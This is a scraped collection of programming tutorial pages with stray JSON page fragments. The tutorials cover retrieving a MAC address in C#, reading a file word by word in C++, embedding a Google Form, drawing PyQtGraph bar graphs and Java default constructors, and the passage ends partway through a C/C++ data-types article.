See this for implementation.Source : http://qa.geeksforgeeks.org/7487/program-calculate-fifth-without-using-mathematical-operatorsPlease write comments if you find anything incorrect, or you want to share more information about the topic discussed above " }, { "code": null, "e": 35551, "s": 35544, "text": "Sam007" }, { "code": null, "e": 35567, "s": 35551, "text": "Anshul_Aggarwal" }, { "code": null, "e": 35580, "s": 35567, "text": "nitin mittal" }, { "code": null, "e": 35593, "s": 35580, "text": "rituraj_jain" }, { "code": null, "e": 35606, "s": 35593, "text": "Mithun Kumar" }, { "code": null, "e": 35621, "s": 35606, "text": "chinmoy1997pal" }, { "code": null, "e": 35634, "s": 35621, "text": "princi singh" }, { "code": null, "e": 35650, "s": 35634, "text": "pankajsharmagfg" }, { "code": null, "e": 35677, "s": 35650, "text": "ashutoshsinghgeeksforgeeks" }, { "code": null, "e": 35688, "s": 35677, "text": "Algorithms" }, { "code": null, "e": 35699, "s": 35688, "text": "Algorithms" }, { "code": null, "e": 35797, "s": 35699, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 35806, "s": 35797, "text": "Comments" }, { "code": null, "e": 35819, "s": 35806, "text": "Old Comments" }, { "code": null, "e": 35844, "s": 35819, "text": "DSA Sheet by Love Babbar" }, { "code": null, "e": 35900, "s": 35844, "text": "Difference between Informed and Uninformed Search in AI" }, { "code": null, "e": 35943, "s": 35900, "text": "SCAN (Elevator) Disk Scheduling Algorithms" }, { "code": null, "e": 35972, "s": 35943, "text": "Quadratic Probing in Hashing" }, { "code": null, "e": 36006, "s": 35972, "text": "K means Clustering - Introduction" }, { "code": null, "e": 36070, "s": 36006, "text": "What are Hash Functions and How to choose a good Hash Function?" }, { "code": null, "e": 36123, "s": 36070, "text": "Difference between Algorithm, Pseudocode and Program" }, { "code": null, "e": 36155, "s": 36123, "text": "FCFS Disk Scheduling Algorithms" } ]
Extracting MAC address using C#
A MAC address of a device is a media access control address. It is a unique identifier assigned to a network interface.

The MAC address technology is used by many technologies such as Ethernet, Bluetooth, Fibre Channel, etc.

Here, we will use the following method to enumerate all the network interfaces on the computer.

NetworkInterface.GetAllNetworkInterfaces

For this, the OperationalStatus enumeration is used to select an interface that is currently up.

using System.Net.NetworkInformation;

static string GetMacAddress() {
   string addr = "";
   foreach (NetworkInterface n in NetworkInterface.GetAllNetworkInterfaces()) {
      if (n.OperationalStatus == OperationalStatus.Up) {
         addr += n.GetPhysicalAddress().ToString();
         break;
      }
   }
   return addr;
}

Above, we have used the GetPhysicalAddress() method to extract the MAC address.
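GetPhysicalAddress().ToString() returns the bytes as one unseparated hex string. A hedged variation, assuming you want the conventional colon-separated form (the helper name is mine):

using System.Linq;
using System.Net.NetworkInformation;

// returns the first "up" interface's address as AA:BB:CC:DD:EE:FF
static string GetMacAddressPretty() {
   foreach (NetworkInterface n in NetworkInterface.GetAllNetworkInterfaces()) {
      if (n.OperationalStatus == OperationalStatus.Up) {
         byte[] bytes = n.GetPhysicalAddress().GetAddressBytes();
         return string.Join(":", bytes.Select(b => b.ToString("X2")));
      }
   }
   return "";
}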
[ { "code": null, "e": 1172, "s": 1062, "text": "A MAC address of a device is a media access control address. It is a unique identifier assigned to a network." }, { "code": null, "e": 1277, "s": 1172, "text": "The MAC address technology is used by many technologies such as Ethernet, Bluetooth, Fibre Channel, etc." }, { "code": null, "e": 1373, "s": 1277, "text": "Here, we will use the following method to check for all the network interfaces on the computer." }, { "code": null, "e": 1414, "s": 1373, "text": "NetworkInterface.GetAllNetworkInterfaces" }, { "code": null, "e": 1517, "s": 1414, "text": "For this, the NetworkInterfaceType Enumeration is also used to specify the type of network interfaces." }, { "code": null, "e": 1748, "s": 1517, "text": "string addr = \"\";\nforeach (NetworkInterface n in NetworkInterface.GetAllNetworkInterfaces()) {\n if (n.OperationalStatus == OperationalStatus.Up) {\n addr += n.GetPhysicalAddress().ToString();\n break;\n }\n}\nreturn addr;" }, { "code": null, "e": 1828, "s": 1748, "text": "Above, we have used the GetPhysicalAddress() method to extract the MAC address." } ]
C++ program to read file word by word
08 May, 2019

Given a text file, extract words from it. In other words, read the content of the file word by word.

Example :

Input: And in that dream, we were flying.
Output:
And
in
that
dream,
we
were
flying.

Approach :
1) Open the file which contains the string. For example, a file named "file.txt" contains the string "geeks for geeks".
2) Create a filestream variable to store the file content.
3) Extract and print words from the file stream into a string variable via a while loop.

// C++ implementation to read
// file word by word
#include <bits/stdc++.h>
using namespace std;

// driver code
int main()
{
    // filestream variable file
    fstream file;
    string word, filename;

    // filename of the file
    filename = "file.txt";

    // opening file
    file.open(filename.c_str());

    // extracting words from the file
    while (file >> word)
    {
        // displaying content
        cout << word << endl;
    }
    return 0;
}

Output:
geeks
for
geeks
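The same stream-extraction idiom extends naturally to counting words instead of printing them, since operator>> already skips whitespace. A minimal sketch, assuming the same file.txt:

// C++ sketch: count the words in a file
#include <bits/stdc++.h>
using namespace std;

int main()
{
    fstream file;
    file.open("file.txt");

    // each successful extraction is exactly one word
    string word;
    size_t count = 0;
    while (file >> word)
        count++;

    cout << "Word count: " << count << endl;
    return 0;
}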
[ { "code": null, "e": 54, "s": 26, "text": "\n08 May, 2019" }, { "code": null, "e": 160, "s": 54, "text": "Given a text file, extract words from it. In other words, read the content of file word by word.Example :" }, { "code": null, "e": 246, "s": 160, "text": "Input: And in that dream, we were flying.\nOutput:\nAnd\nin\nthat\ndream,\nwe\nwere\nflying.\n" }, { "code": null, "e": 257, "s": 246, "text": "Approach :" }, { "code": null, "e": 509, "s": 257, "text": "1) Open the file which contains string. For example, file named “file.txt” contains a string “geeks for geeks”.2) Create a filestream variable to store file content.3) Extract and print words from the file stream into a string variable via while loop." }, { "code": "// C++ implementation to read// file word by word#include <bits/stdc++.h>using namespace std; // driver codeint main(){ // filestream variable file fstream file; string word, t, q, filename; // filename of the file filename = \"file.txt\"; // opening file file.open(filename.c_str()); // extracting words from the file while (file >> word) { // displaying content cout << word << endl; } return 0;}", "e": 965, "s": 509, "text": null }, { "code": null, "e": 973, "s": 965, "text": "Output:" }, { "code": null, "e": 991, "s": 973, "text": "geeks\nfor\ngeeks.\n" }, { "code": null, "e": 1008, "s": 991, "text": "imim123345667899" }, { "code": null, "e": 1026, "s": 1008, "text": "cpp-file-handling" }, { "code": null, "e": 1039, "s": 1026, "text": "C++ Programs" } ]
How to embed Google Forms on any Website ?
01 Oct, 2020

Google Forms is one of the most famous online platforms developed and supported by Google. One can create and customize forms and perform various tasks, from collecting reviews to automatic certificate generation. One can also embed a form on a website so that anyone visiting the website can submit or view the form. This article will describe the method to embed a Google Form on any website.

Step 1: Create the Google Form that has to be embedded. The How to Create and Customize Google Forms? article has the steps needed to create and customize Google Forms as per the requirements.

Step 2: After the form has been created, click on the Send button as shown in the image below.

Step 3: Select the embed option from the available options of sending. This would show an <iframe> link that has to be copied.

Step 4: Add this <iframe> link in the HTML source code of the page where the form has to be embedded. This will automatically display the form and allow it to be filled on the page itself. The example below illustrates how the form has to be embedded.

Example:

HTML

<!DOCTYPE html>
<html>

<body>
    <h1 style="color: green;">
        GeeksforGeeks
    </h1>
    <p>
        How to embed Google Forms
        on any website?
    </p>

    <!-- Specify the <iframe> given by the
         Google Forms embed page -->
    <iframe src="Your Copied Form Source"
            width="550" height="600"
            frameborder="0" marginheight="0"
            marginwidth="0">
        Loading...
    </iframe>
</body>

</html>

Output:

The output screen will look like this
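A fixed 550-pixel width can overflow on small screens. A hedged variation (the wrapper styling below is my own suggestion, not part of the code Google Forms generates):

<!-- center the form and let it shrink on narrow screens -->
<div style="max-width: 640px; margin: 0 auto;">
    <iframe src="Your Copied Form Source"
            width="100%" height="600"
            frameborder="0">
        Loading...
    </iframe>
</div>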
[ { "code": null, "e": 54, "s": 26, "text": "\n01 Oct, 2020" }, { "code": null, "e": 447, "s": 54, "text": "Google Forms are one of the most famous online platform developed and supported by Google. One can create and customize the created forms and can perform various tasks from review to automatic certificate generator. One can also embed it on a website so that anyone visiting the website can submit or view the form. This article will describe the method to embed a Google Form to any website." }, { "code": null, "e": 638, "s": 447, "text": "Step 1: Create a Google Form that has to be embedded. The How to Create and Customize Google Forms? article has the steps needed to create and customize Google Forms as per the requirements." }, { "code": null, "e": 733, "s": 638, "text": "Step 2: After the form has been created, click on the Send button as shown in the image below." }, { "code": null, "e": 860, "s": 733, "text": "Step 3: Select the embed option from the available options of sending. This would show an <iframe> link that has to be copied." }, { "code": null, "e": 1112, "s": 860, "text": "Step 3: Add this <iframe> link in the HTML source code of the page where the form has to be embedded. This will automatically display the form and allow it to be filled on the page itself. The example below illustrates how the form has to be embedded." }, { "code": null, "e": 1121, "s": 1112, "text": "Example:" }, { "code": null, "e": 1126, "s": 1121, "text": "HTML" }, { "code": "<!DOCTYPE html><html> <body> <h1 style=\"color: green;\"> GeeksforGeeks </h1> <p> How to embed Google Forms on any website? </p> <!-- Specify the <iframe> given by the the Google Forms embed page --> <iframe src=\"Your Copied Form Source\" width=\"550\" height=\"600\" frameborder=\"0\" marginheight=\"0\" marginwidth=\"0\"> Loading... </iframe></body> </html>", "e": 1561, "s": 1126, "text": null }, { "code": null, "e": 1569, "s": 1561, "text": "Output:" }, { "code": null, "e": 1607, "s": 1569, "text": "The output screen will look like this" }, { "code": null, "e": 1614, "s": 1607, "text": "How To" }, { "code": null, "e": 1619, "s": 1614, "text": "HTML" }, { "code": null, "e": 1636, "s": 1619, "text": "Web Technologies" }, { "code": null, "e": 1663, "s": 1636, "text": "Web technologies Questions" }, { "code": null, "e": 1668, "s": 1663, "text": "HTML" } ]
Python – K Maximum elements with Index in List
01 Aug, 2020

Given a List, extract the K maximum elements with their indices.

Input : test_list = [5, 3, 1, 4, 7, 8, 2], K = 2
Output : [(4, 7), (5, 8)]
Explanation : 8 is maximum at index 5, 7 at index 4.

Input : test_list = [5, 3, 1, 4, 7, 10, 2], K = 1
Output : [(5, 10)]
Explanation : 10 is maximum at index 5.

Method #1 : Using sorted() + index()

The combination of the above functions provides a way of finding a solution to this problem. In this, we initially sort the list and extract the K maximum elements, which are then encapsulated in tuples with their positions in the original list. Note that index() returns the first occurrence of a value, so this method assumes the K maximum elements are distinct.

Python3

# Python3 code to demonstrate working of
# K Maximum elements with Index in List
# Using sorted() + index()

# initializing list
test_list = [5, 3, 1, 4, 7, 8, 2]

# printing original list
print("The original list : " + str(test_list))

# initializing K
K = 3

# using sorted() to sort and slice K maximum elements
temp = sorted(test_list)[-K:]
res = []
for ele in temp:

    # encapsulating elements with index using index()
    res.append((test_list.index(ele), ele))

# printing result
print("K Maximum with indices : " + str(res))

The original list : [5, 3, 1, 4, 7, 8, 2]
K Maximum with indices : [(0, 5), (4, 7), (5, 8)]

Method #2 : Using enumerate() + itemgetter()

The combination of the above functions can be used to solve this problem. In this, we perform the task of pairing indices with values using enumerate(), and itemgetter() is used as the sort key to order the pairs by value.

Python3

# Python3 code to demonstrate working of
# K Maximum elements with Index in List
# Using enumerate() + itemgetter()
from operator import itemgetter

# initializing list
test_list = [5, 3, 1, 4, 7, 8, 2]

# printing original list
print("The original list : " + str(test_list))

# initializing K
K = 3

# Making index-value pairs, sorting by value,
# then slicing the K maximum pairs
res = sorted(enumerate(test_list), key = itemgetter(1))[-K:]

# printing result
print("K Maximum with indices : " + str(res))

The original list : [5, 3, 1, 4, 7, 8, 2]
K Maximum with indices : [(0, 5), (4, 7), (5, 8)]
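Both methods above sort the whole list, which is O(n log n). A hedged alternative using heapq.nlargest runs in O(n log K) and, because it carries the enumerate() index along, stays correct even when values repeat:

import heapq

test_list = [5, 3, 1, 4, 7, 8, 2]
K = 3

# nlargest compares the value part of each (index, value) pair
res = heapq.nlargest(K, enumerate(test_list), key=lambda pair: pair[1])

print(res)  # [(5, 8), (4, 7), (0, 5)]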
[ { "code": null, "e": 28, "s": 0, "text": "\n01 Aug, 2020" }, { "code": null, "e": 89, "s": 28, "text": "GIven a List, extract K Maximum elements with their indices." }, { "code": null, "e": 211, "s": 89, "text": "Input : test_list = [5, 3, 1, 4, 7, 8, 2], K = 2Output : [(4, 7), (5, 8)]Explanation : 8 is maximum on index 5, 7 on 4th." }, { "code": null, "e": 318, "s": 211, "text": "Input : test_list = [5, 3, 1, 4, 7, 10, 2], K = 1Output : [(5, 10)]Explanation : 10 is maximum on index 5." }, { "code": null, "e": 355, "s": 318, "text": "Method #1 : Using sorted() + index()" }, { "code": null, "e": 577, "s": 355, "text": "The combination of above functions provide a way of finding solution to this problem. In this, we initially perform sort and extract K maximum elements, then are encapsulated in tuple with their ordering in original list." }, { "code": null, "e": 585, "s": 577, "text": "Python3" }, { "code": "# Python3 code to demonstrate working of # K Maximum elements with Index in List# Using sorted() + index() # initializing listtest_list = [5, 3, 1, 4, 7, 8, 2] # printing original list print(\"The original list : \" + str(test_list)) # initializing KK = 3 # Using sorted() + index()# using sorted() to sort and slice K maximum elements temp = sorted(test_list)[-K:]res = []for ele in temp: # encapsulating elements with index using index() res.append((test_list.index(ele), ele)) # printing result print(\"K Maximum with indices : \" + str(res))", "e": 1144, "s": 585, "text": null }, { "code": null, "e": 1237, "s": 1144, "text": "The original list : [5, 3, 1, 4, 7, 8, 2]\nK Maximum with indices : [(0, 5), (4, 7), (5, 8)]\n" }, { "code": null, "e": 1282, "s": 1237, "text": "Method #2 : Using enumerate() + itemgetter()" }, { "code": null, "e": 1465, "s": 1282, "text": "The combination of above functions can be used to solve this problem. In this, we perform the task of getting indices using enumerate() and itemgetter() is used to get the elements. " }, { "code": null, "e": 1473, "s": 1465, "text": "Python3" }, { "code": "# Python3 code to demonstrate working of# K Maximum elements with Index in List# Using enumerate() + itemgetter()from operator import itemgetter # initializing listtest_list = [5, 3, 1, 4, 7, 8, 2] # printing original listprint(\"The original list : \" + str(test_list)) # initializing KK = 3 # Using enumerate() + itemgetter()# Making index values pairs at 1st stageres = list(sorted(enumerate(test_list), key = itemgetter(1)))[-K:] # printing resultprint(\"K Maximum with indices : \" + str(res))", "e": 1973, "s": 1473, "text": null }, { "code": null, "e": 2066, "s": 1973, "text": "The original list : [5, 3, 1, 4, 7, 8, 2]\nK Maximum with indices : [(0, 5), (4, 7), (5, 8)]\n" }, { "code": null, "e": 2087, "s": 2066, "text": "Python list-programs" }, { "code": null, "e": 2094, "s": 2087, "text": "Python" }, { "code": null, "e": 2110, "s": 2094, "text": "Python Programs" } ]
TypeScript | Array unshift() Method
15 Dec, 2021

The Array.unshift() is an inbuilt TypeScript function that adds one or more elements to the beginning of an array and returns the new length of the array.

Syntax:

array.unshift( element1, ..., elementN )

Parameter: This method accepts any number of elements.

element1, ..., elementN : The elements to add to the front of the array.

Return Value: This method returns the length of the new array.

The examples below illustrate the Array.unshift() method in TypeScript:

Example 1:

JavaScript

<script>
    // Driver code
    var arr = [ 11, 89, 23, 7, 98 ];

    // use of unshift() method; the return
    // value is the new length of the array
    var newLength = arr.unshift(11);

    // printing
    console.log( newLength );
</script>

Output:

6

Example 2:

JavaScript

<script>
    // Driver code
    var arr = ["G", "e", "e", "k", "s", "f", "o", "r",
               "g", "e", "e", "k", "s"];
    var val;

    // use of unshift() method
    val = arr.unshift("f");
    console.log( val );
    console.log( arr );
</script>

Output:

14
["f","G","e","e","k","s","f","o","r","g","e","e","k","s"]

TypeScript
JavaScript
Web Technologies
[ { "code": null, "e": 28, "s": 0, "text": "\n15 Dec, 2021" }, { "code": null, "e": 194, "s": 28, "text": "The Array.unshift() is an inbuilt TypeScript function that is used to add one or more elements to the beginning of an array and returns the new length of the array. " }, { "code": null, "e": 202, "s": 194, "text": "Syntax:" }, { "code": null, "e": 243, "s": 202, "text": "array.unshift( element1, ..., elementN )" }, { "code": null, "e": 304, "s": 243, "text": "Parameter: This method accepts n number of similar elements." }, { "code": null, "e": 395, "s": 304, "text": "element1, ..., elementN : This parameter is the elements to add to the front of the array." }, { "code": null, "e": 529, "s": 395, "text": "Return Value: This method returns the length of the new array. Below example illustrate the String unshift() method in TypeScriptJS:" }, { "code": null, "e": 541, "s": 529, "text": "Example 1: " }, { "code": null, "e": 552, "s": 541, "text": "JavaScript" }, { "code": "<script> // Driver code var arr = [ 11, 89, 23, 7, 98 ]; // use of unshift() method var string= arr.unshift(11); // printing console.log( string);</script>", "e": 733, "s": 552, "text": null }, { "code": null, "e": 744, "s": 733, "text": " Output: " }, { "code": null, "e": 746, "s": 744, "text": "6" }, { "code": null, "e": 759, "s": 746, "text": "Example 2: " }, { "code": null, "e": 770, "s": 759, "text": "JavaScript" }, { "code": "<script> // Driver code var arr = [\"G\", \"e\", \"e\", \"k\", \"s\", \"f\", \"o\", \"r\", \"g\", \"e\", \"e\", \"k\", \"s\"]; var val; // use of unshift() method val = arr.unshift(\"f\"); console.log( val ); console.log( arr );</script>", "e": 1017, "s": 770, "text": null }, { "code": null, "e": 1028, "s": 1017, "text": " Output: " }, { "code": null, "e": 1089, "s": 1028, "text": "14\n[\"f\",\"G\",\"e\",\"e\",\"k\",\"s\",\"f\",\"o\",\"r\",\"g\",\"e\",\"e\",\"k\",\"s\"]" }, { "code": null, "e": 1103, "s": 1091, "text": "anikakapoor" }, { "code": null, "e": 1114, "s": 1103, "text": "TypeScript" }, { "code": null, "e": 1125, "s": 1114, "text": "JavaScript" }, { "code": null, "e": 1142, "s": 1125, "text": "Web Technologies" } ]
Node.js util.types.isDate() Method
08 Oct, 2021

The util.types.isDate() method is an inbuilt application programming interface of the util module which is used to check whether a value is a built-in Date object in Node.js.

Syntax:

util.types.isDate( value )

Parameters: This method accepts a single parameter as mentioned above and described below.

value: It is a required parameter and can be of any datatype.

Return Value: This method returns a boolean value: TRUE if the value is a Date object, FALSE otherwise.

The examples below illustrate the use of the util.types.isDate() method in Node.js:

Example 1:

// Node.js program to demonstrate the
// util.types.isDate() Method

// Allocating util module
const util = require('util');

// Values to be passed as parameters
// of util.types.isDate() method
var v1 = new Date();
var v2 = 3 / 6 / 96;

// Printing the returned value from
// util.types.isDate() method
console.log(util.types.isDate(v1));
console.log(util.types.isDate(v2));

Output:

true
false

Example 2:

// Node.js program to demonstrate the
// util.types.isDate() Method

// Allocating util module
const util = require('util');

// Values to be passed as parameters
// of util.types.isDate() method
var v1 = new Date();
var v2 = 3 / 6 / 96;

// Calling util.types.isDate() method
if (util.types.isDate(v1))
    console.log("The passed value is a Date.");
else
    console.log("The passed value is not a Date");

if (util.types.isDate(v2))
    console.log("The passed value is a Date.");
else
    console.log("The passed value is not a Date");

Output:

The passed value is a Date.
The passed value is not a Date

Note: The above program will compile and run by using the node filename.js command.

Reference: https://nodejs.org/api/util.html#util_util_types_isdate_value

Node.js-util-module
Node.js
Web Technologies
[ { "code": null, "e": 28, "s": 0, "text": "\n08 Oct, 2021" }, { "code": null, "e": 179, "s": 28, "text": "The util.types.isDate() method is an inbuilt application programming interface of the util module which is used to check type for Date in the node.js." }, { "code": null, "e": 187, "s": 179, "text": "Syntax:" }, { "code": null, "e": 214, "s": 187, "text": "util.types.isDate( value )" }, { "code": null, "e": 303, "s": 214, "text": "Parameters: This method accepts single parameter as mentioned above and described below." }, { "code": null, "e": 354, "s": 303, "text": "value: It is a required parameter of any datatype." }, { "code": null, "e": 451, "s": 354, "text": "Return Value: This returns a boolean value, TRUE if the value is a Date object, FALSE otherwise." }, { "code": null, "e": 527, "s": 451, "text": "Below examples illustrate the use of util.types.isDate() method in Node.js:" }, { "code": null, "e": 538, "s": 527, "text": "Example 1:" }, { "code": "// Node.js program to demonstrate the // util.types.isDate() Method // Allocating util moduleconst util = require('util'); // Value to be passed as parameter// of util.types.isDate() methodvar v1 = new Date();var v2 = 3 / 6 / 96; // Printing the returned value from// util.types.isDate() methodconsole.log(util.types.isDate(v1));console.log(util.types.isDate(v2));", "e": 908, "s": 538, "text": null }, { "code": null, "e": 916, "s": 908, "text": "Output:" }, { "code": null, "e": 928, "s": 916, "text": "true\nfalse\n" }, { "code": null, "e": 939, "s": 928, "text": "Example 2:" }, { "code": "// Node.js program to demonstrate the // util.types.isDate() Method // Allocating util moduleconst util = require('util'); // Value to be passed as parameter// of util.types.isDate() methodvar v1 = new Date();var v2 = 3 / 6 / 96; // Calling util.types.isDate() methodif (util.types.isDate(v1)) console.log(\"The passed value is a Date.\");else console.log(\"The passed value is not a Date\"); if (util.types.isDate(v2)) console.log(\"The passed value is a Date.\");else console.log(\"The passed value is not a Date\");", "e": 1468, "s": 939, "text": null }, { "code": null, "e": 1476, "s": 1468, "text": "Output:" }, { "code": null, "e": 1536, "s": 1476, "text": "The passed value is a Date.\nThe passed value is not a Date\n" }, { "code": null, "e": 1620, "s": 1536, "text": "Note: The above program will compile and run by using the node filename.js command." }, { "code": null, "e": 1693, "s": 1620, "text": "Reference: https://nodejs.org/api/util.html#util_util_types_isdate_value" }, { "code": null, "e": 1713, "s": 1693, "text": "Node.js-util-module" }, { "code": null, "e": 1721, "s": 1713, "text": "Node.js" }, { "code": null, "e": 1738, "s": 1721, "text": "Web Technologies" } ]
PyQtGraph – Bar Graph
05 May, 2021

In this article we will see how to create a bar graph using the PyQtGraph module. PyQtGraph is a graphics and user-interface library for Python that provides functionality commonly required in engineering and science applications. Its primary goal is to provide fast, interactive graphics for displaying data (plots, video, etc.); its secondary goal is to provide tools that aid rapid application development (for example, property trees such as those used in Qt Designer).

A bar graph is a method for visualizing a set of data. Simple bar graphs compare data with one independent variable and can relate to a set point or range of data. Complex bar graphs compare data with two independent variables. Either type of graph can be oriented horizontally or vertically. In PyQtGraph, a bar graph is created with the help of the BarGraphItem class.

In order to plot a bar graph in PyQtGraph we have to do the following:
1. Import the pyqtgraph module
2. Create a plot window
3. Create or get the plotting data, i.e. the horizontal and vertical data
4. Create a BarGraphItem object to plot the bar graph from the data
5. Add the BarGraphItem object to the plot window

Below is the implementation:

# importing pyqtgraph as pg
import pyqtgraph as pg

# importing QtCore and QtGui from
# the pyqtgraph module
from pyqtgraph.Qt import QtCore, QtGui

# importing numpy as np
import numpy as np

# creating a pyqtgraph plot window
window = pg.plot()

# setting window geometry
# left = 100, top = 100
# width = 600, height = 500
window.setGeometry(100, 100, 600, 500)

# title for the plot window
title = "GeeksforGeeks PyQtGraph"

# setting window title to plot window
window.setWindowTitle(title)

# create list for y-axis
y1 = [5, 5, 7, 10, 3, 8, 9, 1, 6, 2]

# create horizontal list i.e x-axis
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]

# create pyqtgraph bar graph item
# with width = 0.6
# with bar colors = green
bargraph = pg.BarGraphItem(x = x, height = y1, width = 0.6, brush ='g')

# add item to plot window
# adding bargraph item to the window
window.addItem(bargraph)

# main method
if __name__ == '__main__':

    # importing system
    import sys

    # Start Qt event loop unless running in interactive mode
    if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
        QtGui.QApplication.instance().exec_()

Output :

Python-gui
Python-PyQtGraph
Python
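The same BarGraphItem class can also draw several series side by side. The sketch below is not part of the original article, and the data values in it are made up for illustration; it shifts the x-coordinates of each series by half a bar width so the two groups of bars sit next to each other.

# Grouped bar graph sketch (assumed example, not from the original article)
import numpy as np
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui

# creating a pyqtgraph plot window
window = pg.plot()
window.setWindowTitle("GeeksforGeeks PyQtGraph - Grouped Bars")

# x positions and two (made-up) data series of equal length
x = np.arange(1, 8)
y1 = [5, 5, 7, 10, 3, 8, 9]
y2 = [3, 6, 4, 8, 7, 2, 5]

# shift each series by half a bar width (0.3 / 2 = 0.15)
# so the green and blue bars sit side by side at each x
bars1 = pg.BarGraphItem(x = x - 0.15, height = y1, width = 0.3, brush = 'g')
bars2 = pg.BarGraphItem(x = x + 0.15, height = y2, width = 0.3, brush = 'b')

# adding both bar graph items to the window
window.addItem(bars1)
window.addItem(bars2)

# main method
if __name__ == '__main__':
    import sys

    # Start Qt event loop unless running in interactive mode
    if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
        QtGui.QApplication.instance().exec_()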
[ { "code": null, "e": 28, "s": 0, "text": "\n05 May, 2021" }, { "code": null, "e": 487, "s": 28, "text": "In this article we will see how we can create bar graph in the PyQtGraph module. PyQtGraph is a graphics and user interface library for Python that provides functionality commonly required in designing and science applications. Its primary goals are to provide fast, interactive graphics for displaying data (plots, video, etc.) and second is to provide tools to aid in rapid application development (for example, property trees such as used in Qt Designer)." }, { "code": null, "e": 851, "s": 487, "text": "A bar graph is a method for visualizing a set of data. Simple bar graphs compare data with one independent variable and can relate to a set point or range of data. Complex bar graphs compare data with two independent variables. Either type of graph can be oriented horizontally or vertically. Bar graph is created with the help of BarGraphItem class in PyQtGraph." }, { "code": null, "e": 1170, "s": 851, "text": "In order to plot the bar graph in PyQtGraph we have to do the following1. Importing the PyQtgraph module2. Creating a plot window3. Create or get the plotting data i.e horizontal and vertical data4. Create a BarGraphItem object to plot the bar graph between the data5. Append the BarGraphItem object to the plot window" }, { "code": null, "e": 1198, "s": 1170, "text": "Below is the implementation" }, { "code": "# importing pyqtgraph as pgimport pyqtgraph as pg # importing QtCore and QtGui from # the pyqtgraph modulefrom pyqtgraph.Qt import QtCore, QtGui # importing numpy as npimport numpy as np import time # creating a pyqtgraph plot windowwindow = pg.plot() # setting window geometry# left = 100, top = 100# width = 600, height = 500window.setGeometry(100, 100, 600, 500) # title for the plot windowtitle = \"GeeksforGeeks PyQtGraph\" # setting window title to plot windowwindow.setWindowTitle(title) # create list for y-axisy1 = [5, 5, 7, 10, 3, 8, 9, 1, 6, 2] # create horizontal list i.e x-axisx = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] # create pyqt5graph bar graph item# with width = 0.6# with bar colors = greenbargraph = pg.BarGraphItem(x = x, height = y1, width = 0.6, brush ='g') # add item to plot window# adding bargraph item to the windowwindow.addItem(bargraph) # main methodif __name__ == '__main__': # importing system import sys # Start Qt event loop unless running in interactive mode or using if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'): QtGui.QApplication.instance().exec_()", "e": 2349, "s": 1198, "text": null }, { "code": null, "e": 2358, "s": 2349, "text": "Output :" }, { "code": null, "e": 2369, "s": 2358, "text": "Python-gui" }, { "code": null, "e": 2386, "s": 2369, "text": "Python-PyQtGraph" }, { "code": null, "e": 2393, "s": 2386, "text": "Python" } ]
Default constructor in Java
10 Jul, 2018

Like C++, Java automatically creates a default constructor if the user has written no default or parameterized constructor, and (like C++) the default constructor automatically calls the parent's default constructor. But unlike C++, the default constructor in Java initializes member data variables to default values (numeric values are initialized to 0, booleans are initialized to false and references are initialized to null).

For example, the output of the below program is

0
null
false
0
0.0

// Main.java
class Test {
    int i;
    Test t;
    boolean b;
    byte bt;
    float ft;
}

public class Main {
    public static void main(String args[])
    {
        Test t = new Test(); // default constructor is called.
        System.out.println(t.i);
        System.out.println(t.t);
        System.out.println(t.b);
        System.out.println(t.bt);
        System.out.println(t.ft);
    }
}

Reference: http://leepoint.net/notes-java/oop/constructors/constructor.html

Java
School Programming
[ { "code": null, "e": 53, "s": 25, "text": "\n10 Jul, 2018" }, { "code": null, "e": 474, "s": 53, "text": "Like C++, Java automatically creates default constructor if there is no default or parameterized constructor written by user, and (like C++) the default constructor automatically calls parent default constructor. But unlike C++, default constructor in Java initializes member data variable to default values (numeric values are initialized as 0, booleans are initialized as false and references are initialized as null)." }, { "code": null, "e": 518, "s": 474, "text": "For example, output of the below program is" }, { "code": null, "e": 533, "s": 518, "text": "0nullfalse00.0" }, { "code": "// Main.javaclass Test { int i; Test t; boolean b; byte bt; float ft;} public class Main { public static void main(String args[]) { Test t = new Test(); // default constructor is called. System.out.println(t.i); System.out.println(t.t); System.out.println(t.b); System.out.println(t.bt); System.out.println(t.ft); }}", "e": 897, "s": 533, "text": null }, { "code": null, "e": 1022, "s": 897, "text": "Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above." }, { "code": null, "e": 1098, "s": 1022, "text": "References:http://leepoint.net/notes-java/oop/constructors/constructor.html" }, { "code": null, "e": 1103, "s": 1098, "text": "Java" }, { "code": null, "e": 1122, "s": 1103, "text": "School Programming" }, { "code": null, "e": 1127, "s": 1122, "text": "Java" }, { "code": null, "e": 1225, "s": 1127, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 1240, "s": 1225, "text": "Arrays in Java" }, { "code": null, "e": 1284, "s": 1240, "text": "Split() String method in Java with examples" }, { "code": null, "e": 1320, "s": 1284, "text": "Arrays.sort() in Java with examples" }, { "code": null, "e": 1371, "s": 1320, "text": "Object Oriented Programming (OOPs) Concept in Java" }, { "code": null, "e": 1396, "s": 1371, "text": "Reverse a string in Java" }, { "code": null, "e": 1414, "s": 1396, "text": "Python Dictionary" }, { "code": null, "e": 1439, "s": 1414, "text": "Reverse a string in Java" }, { "code": null, "e": 1455, "s": 1439, "text": "Arrays in C/C++" }, { "code": null, "e": 1478, "s": 1455, "text": "Introduction To PYTHON" } ]
Interesting facts about data-types and modifiers in C/C++
17 Apr, 2020

Here are some logical and interesting facts about data types and the modifiers associated with them:

1. If no base data type is given in a declaration (only a modifier such as signed), the compiler automatically treats the variable as an int.

C++

#include <iostream>
using namespace std;

int main()
{
    signed a;
    signed b;

    // size of a and b is equal to the size of int
    cout << "The size of a is " << sizeof(a) << endl;
    cout << "The size of b is " << sizeof(b);
    return (0);
}

C

#include <stdio.h>
int main()
{
    signed a;
    signed b;

    // size of a and b is equal to the size of int
    printf("The size of a is %zu\n", sizeof(a));
    printf("The size of b is %zu", sizeof(b));
    return (0);
}

Output:
The size of a is 4
The size of b is 4

2. signed is the default modifier for the int data type, and on most common platforms plain char also behaves as signed char (strictly speaking, the signedness of char is implementation-defined).

C++

#include <iostream>
using namespace std;

int main()
{
    int x;
    char y;
    x = -1;
    y = -2;

